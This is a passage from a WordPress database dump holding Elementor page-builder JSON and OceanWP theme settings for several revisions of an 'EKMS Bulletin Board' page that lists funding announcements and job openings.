Y\"}],\"post_title_color\":\"#6ec1e4\",\"post_title_color_hover\":\"#006400\",\"post_text_color\":\"rgba(122,122,122,0.59)\",\"post_text_typography_typography\":\"custom\",\"post_text_typography_font_size\":{\"unit\":\"px\",\"size\":13,\"sizes\":[]},\"meta_color\":\"#7a7a7a\",\"meta_typography_typography\":\"custom\",\"meta_typography_font_size\":{\"unit\":\"px\",\"size\":13,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"jet-blog-smart-listing\"}],\"isInner\":false}],\"isInner\":false}]'),(16581,2495,'_elementor_edit_mode','builder'),(16582,2495,'_elementor_template_type','wp-page'),(16583,2495,'_elementor_version','2.7.5'),(16584,2495,'_wp_page_template','default'),(16585,2495,'_elementor_data','[{\"id\":\"54b7556\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df75915\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"b473d47\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"5f2c7e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"You are on the EKMS Bulletin Board:\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"2079558\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>This bulletin provides a space for funding announcements, jobs, and other related openings.<\\/p>\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"054d4e8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0991156\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"4f39c88\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"5b49b03\",\"elType\":\"widget\",\"settings\":{\"featured_post\":\"\",\"featured_excerpt_trimmed_ending\":\"...\",\"featured_read_more_text\":\"Read More\",\"posts_rows\":\"6\",\"show_image\":\"\",\"excerpt_trimmed_ending\":\"...\",\"read_more_text\":\"Read More\",\"post_type\":\"ekms_bulletin\",\"all_btn_label\":\"All\",\"show_arrows\":\"yes\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c73414a\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"0baf480\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"post_title_color\":\"#6ec1e4\",\"post_title_color_hover\":\"#006400\",\"post_text_color\":\"rgba(122,122,122,0.59)\",\"post_text_typography_typography\":\"custom\",\"post_text_typography_font_size\":{\"unit\":\"px\",\"size\":13,\"sizes\":[]},\"meta_color\":\"#7a7a7a\",\"meta_typography_typography\":\"custom\",\"meta_typography_font_size\":{\"unit\":\"px\",\"size\":13,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"jet-blog-smart-listing\"}],\"isInner\":false}],\"isInner\":false}]'),(16586,2495,'_elementor_controls_usage','a:5:{s:7:\"heading\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:2;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:13:\"section_title\";a:1:{s:5:\"title\";i:1;}}s:5:\"style\";a:1:{s:19:\"section_title_style\";a:3:{s:11:\"title_color\";i:1;s:21:\"typography_typography\";i:1;s:20:\"typography_font_size\";i:1;}}}}s:11:\"text-editor\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:14:\"section_editor\";a:1:{s:6:\"editor\";i:1;}}s:5:\"style\";a:1:{s:13:\"section_style\";a:1:{s:10:\"text_color\";i:1;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:2;s:15:\"control_percent\";i:0;s:8:\"controls\";a:0:{}}s:7:\"section\";a:3:{s:5:\"count\";i:2;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:6:\"layout\";a:1:{s:16:\"section_parallax\";a:1:{s:24:\"jet_parallax_layout_list\";i:2;}}}}s:22:\"jet-blog-smart-listing\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:2:{s:7:\"content\";a:3:{s:15:\"section_general\";a:3:{s:13:\"featured_post\";i:1;s:10:\"posts_rows\";i:1;s:10:\"show_image\";i:1;}s:13:\"section_query\";a:2:{s:9:\"post_type\";i:1;s:11:\"show_arrows\";i:1;}s:21:\"section_custom_fields\";a:2:{s:18:\"title_related_meta\";i:1;s:20:\"content_related_meta\";i:1;}}s:5:\"style\";a:2:{s:18:\"section_post_style\";a:5:{s:16:\"post_title_color\";i:1;s:22:\"post_title_color_hover\";i:1;s:15:\"post_text_color\";i:1;s:31:\"post_text_typography_typography\";i:1;s:30:\"post_text_typography_font_size\";i:1;}s:18:\"section_meta_style\";a:3:{s:10:\"meta_color\";i:1;s:26:\"meta_typography_typography\";i:1;s:25:\"meta_typography_font_size\";i:1;}}}}}'),(16588,2496,'_elementor_edit_mode','builder'),(16589,2496,'_elementor_template_type','wp-page'),(16590,2496,'_elementor_version','2.7.5'),(16591,2496,'_wp_page_template','default'),(16592,2496,'_elementor_data','[{\"id\":\"54b7556\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df75915\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"b473d47\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"5f2c7e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"You are on the EKMS Bulletin Board:\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"2079558\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>This bulletin provides a space for funding announcements, jobs, and other related openings.<\\/p>\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"054d4e8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0991156\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"4f39c88\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"5b49b03\",\"elType\":\"widget\",\"settings\":{\"featured_post\":\"\",\"featured_excerpt_trimmed_ending\":\"...\",\"featured_read_more_text\":\"Read More\",\"posts_rows\":\"6\",\"show_image\":\"\",\"excerpt_trimmed_ending\":\"...\",\"read_more_text\":\"Read More\",\"post_type\":\"ekms_bulletin\",\"all_btn_label\":\"All\",\"show_arrows\":\"yes\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c73414a\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"0baf480\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"post_title_color\":\"#6ec1e4\",\"post_title_color_hover\":\"#006400\",\"post_text_color\":\"rgba(122,122,122,0.59)\",\"post_text_typography_typography\":\"custom\",\"post_text_typography_font_size\":{\"unit\":\"px\",\"size\":13,\"sizes\":[]},\"meta_color\":\"#7a7a7a\",\"meta_typography_typography\":\"custom\",\"meta_typography_font_size\":{\"unit\":\"px\",\"size\":13,\"sizes\":[]},\"excerpt_length\":10},\"elements\":[],\"widgetType\":\"jet-blog-smart-listing\"}],\"isInner\":false}],\"isInner\":false}]'),(16595,2497,'_elementor_edit_mode','builder'),(16596,2497,'_elementor_template_type','wp-page'),(16597,2497,'_elementor_version','2.7.5'),(16598,2497,'_wp_page_template','default'),(16599,2497,'_elementor_data','[{\"id\":\"54b7556\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df75915\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"b473d47\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"5f2c7e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"You are on the EKMS Bulletin Board:\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"2079558\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>This bulletin provides a space for funding announcements, jobs, and other related openings.<\\/p>\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"054d4e8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0991156\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"4f39c88\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"5b49b03\",\"elType\":\"widget\",\"settings\":{\"featured_post\":\"\",\"featured_excerpt_trimmed_ending\":\"...\",\"featured_read_more_text\":\"Read More\",\"posts_rows\":\"5\",\"show_image\":\"\",\"excerpt_trimmed_ending\":\"...\",\"read_more_text\":\"Read More\",\"post_type\":\"ekms_bulletin\",\"all_btn_label\":\"All\",\"show_arrows\":\"yes\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c73414a\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"0baf480\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"post_title_color\":\"#6ec1e4\",\"post_title_color_hover\":\"#006400\",\"post_text_color\":\"rgba(122,122,122,0.59)\",\"post_text_typography_typography\":\"custom\",\"post_text_typography_font_size\":{\"unit\":\"px\",\"size\":13,\"sizes\":[]},\"meta_color\":\"#7a7a7a\",\"meta_typography_typography\":\"custom\",\"meta_typography_font_size\":{\"unit\":\"px\",\"size\":13,\"sizes\":[]},\"excerpt_length\":10},\"elements\":[],\"widgetType\":\"jet-blog-smart-listing\"}],\"isInner\":false}],\"isInner\":false}]'),(16601,2498,'_elementor_edit_mode','builder'),(16602,2498,'_elementor_template_type','wp-page'),(16603,2498,'_elementor_version','2.7.5'),(16604,2498,'_wp_page_template','default'),(16605,2498,'_elementor_data','[{\"id\":\"54b7556\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df75915\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"b473d47\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"5f2c7e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"You are on the EKMS Bulletin Board:\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"2079558\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>This bulletin provides a space for funding announcements, jobs, and other related openings.<\\/p>\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"59895cc\",\"elType\":\"widget\",\"settings\":{\"text\":\"Divider\",\"color\":\"rgba(122,122,122,0.11)\",\"gap\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"054d4e8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0991156\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"4f39c88\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"5b49b03\",\"elType\":\"widget\",\"settings\":{\"featured_post\":\"\",\"featured_excerpt_trimmed_ending\":\"...\",\"featured_read_more_text\":\"Read More\",\"posts_rows\":\"5\",\"show_image\":\"\",\"excerpt_trimmed_ending\":\"...\",\"read_more_text\":\"Read More\",\"post_type\":\"ekms_bulletin\",\"all_btn_label\":\"All\",\"show_arrows\":\"yes\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c73414a\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"0baf480\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"post_title_color\":\"#6ec1e4\",\"post_title_color_hover\":\"#006400\",\"post_text_color\":\"rgba(122,122,122,0.59)\",\"post_text_typography_typography\":\"custom\",\"post_text_typography_font_size\":{\"unit\":\"px\",\"size\":13,\"sizes\":[]},\"meta_color\":\"#7a7a7a\",\"meta_typography_typography\":\"custom\",\"meta_typography_font_size\":{\"unit\":\"px\",\"size\":13,\"sizes\":[]},\"excerpt_length\":10,\"arrow_type\":\"fa fa-angle-double-left\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-listing\"}],\"isInner\":false}],\"isInner\":false}]'),(16607,2499,'_elementor_edit_mode','builder'),(16608,2499,'_elementor_template_type','wp-page'),(16609,2499,'_elementor_version','2.7.5'),(16610,2499,'_wp_page_template','default'),(16611,2499,'_elementor_data','[{\"id\":\"54b7556\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df75915\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"b473d47\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"5f2c7e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"You are on the EKMS Bulletin Board:\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"2079558\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>This bulletin provides a space for funding announcements, jobs, and other related openings.<\\/p>\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"59895cc\",\"elType\":\"widget\",\"settings\":{\"text\":\"Divider\",\"color\":\"rgba(122,122,122,0.26)\",\"gap\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"054d4e8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0991156\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"4f39c88\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"5b49b03\",\"elType\":\"widget\",\"settings\":{\"featured_post\":\"\",\"featured_excerpt_trimmed_ending\":\"...\",\"featured_read_more_text\":\"Read More\",\"posts_rows\":\"5\",\"show_image\":\"\",\"excerpt_trimmed_ending\":\"...\",\"read_more_text\":\"Read More\",\"post_type\":\"ekms_bulletin\",\"all_btn_label\":\"All\",\"show_arrows\":\"yes\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c73414a\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"0baf480\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"post_title_color\":\"#6ec1e4\",\"post_title_color_hover\":\"#006400\",\"post_text_color\":\"rgba(122,122,122,0.59)\",\"post_text_typography_typography\":\"custom\",\"post_text_typography_font_size\":{\"unit\":\"px\",\"size\":13,\"sizes\":[]},\"meta_color\":\"#7a7a7a\",\"meta_typography_typography\":\"custom\",\"meta_typography_font_size\":{\"unit\":\"px\",\"size\":13,\"sizes\":[]},\"excerpt_length\":10,\"arrow_type\":\"fa fa-angle-double-left\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-listing\"}],\"isInner\":false}],\"isInner\":false}]'),(16613,2500,'_elementor_edit_mode','builder'),(16614,2500,'_elementor_template_type','wp-page'),(16615,2500,'_elementor_version','2.7.5'),(16616,2500,'_wp_page_template','default'),(16617,2500,'_elementor_data','[{\"id\":\"54b7556\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df75915\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"b473d47\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"5f2c7e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"You are on the EKMS Bulletin Board:\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"2079558\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>This bulletin provides a space for funding announcements, jobs, and other related openings.<\\/p>\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"59895cc\",\"elType\":\"widget\",\"settings\":{\"text\":\"Divider\",\"color\":\"rgba(122,122,122,0.26)\",\"gap\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"054d4e8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0991156\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"4f39c88\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"5b49b03\",\"elType\":\"widget\",\"settings\":{\"featured_post\":\"\",\"featured_excerpt_trimmed_ending\":\"...\",\"featured_read_more_text\":\"Read More\",\"posts_rows\":\"5\",\"show_image\":\"\",\"excerpt_trimmed_ending\":\"...\",\"read_more_text\":\"Read More\",\"post_type\":\"ekms_bulletin\",\"all_btn_label\":\"All\",\"show_arrows\":\"yes\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c73414a\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"0baf480\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"post_title_color\":\"#6ec1e4\",\"post_title_color_hover\":\"#006400\",\"post_text_color\":\"rgba(122,122,122,0.59)\",\"post_text_typography_typography\":\"custom\",\"post_text_typography_font_size\":{\"unit\":\"px\",\"size\":13,\"sizes\":[]},\"meta_color\":\"#7a7a7a\",\"meta_typography_typography\":\"custom\",\"meta_typography_font_size\":{\"unit\":\"px\",\"size\":13,\"sizes\":[]},\"excerpt_length\":10,\"arrow_type\":\"fa fa-angle-double-left\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-listing\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9186e06\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"a6cdbb6\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"8206b5e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"260e34c\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false}]'),(16620,74,'osh_disable_topbar_sticky','default'),(16621,74,'osh_disable_header_sticky','default'),(16622,74,'osh_sticky_header_style','default'),(16623,108,'osh_disable_topbar_sticky','default'),(16624,108,'osh_disable_header_sticky','default'),(16625,108,'osh_sticky_header_style','default'),(16626,2503,'_edit_lock','1575401594:1'),(16629,2503,'_edit_last','1'),(16630,2503,'ocean_sidebar','0'),(16631,2503,'ocean_second_sidebar','0'),(16632,2503,'ocean_disable_margins','enable'),(16633,2503,'ocean_display_top_bar','default'),(16634,2503,'ocean_display_header','default'),(16635,2503,'ocean_center_header_left_menu','0'),(16636,2503,'ocean_custom_header_template','0'),(16637,2503,'ocean_header_custom_menu','0'),(16638,2503,'ocean_menu_typo_font_family','0'),(16639,2503,'ocean_disable_title','default'),(16640,2503,'ocean_disable_heading','default'),(16641,2503,'ocean_disable_breadcrumbs','default'),(16642,2503,'ocean_display_footer_widgets','default'),(16643,2503,'ocean_display_footer_bottom','default'),(16644,2503,'ocean_custom_footer_template','0'),(16645,2503,'osh_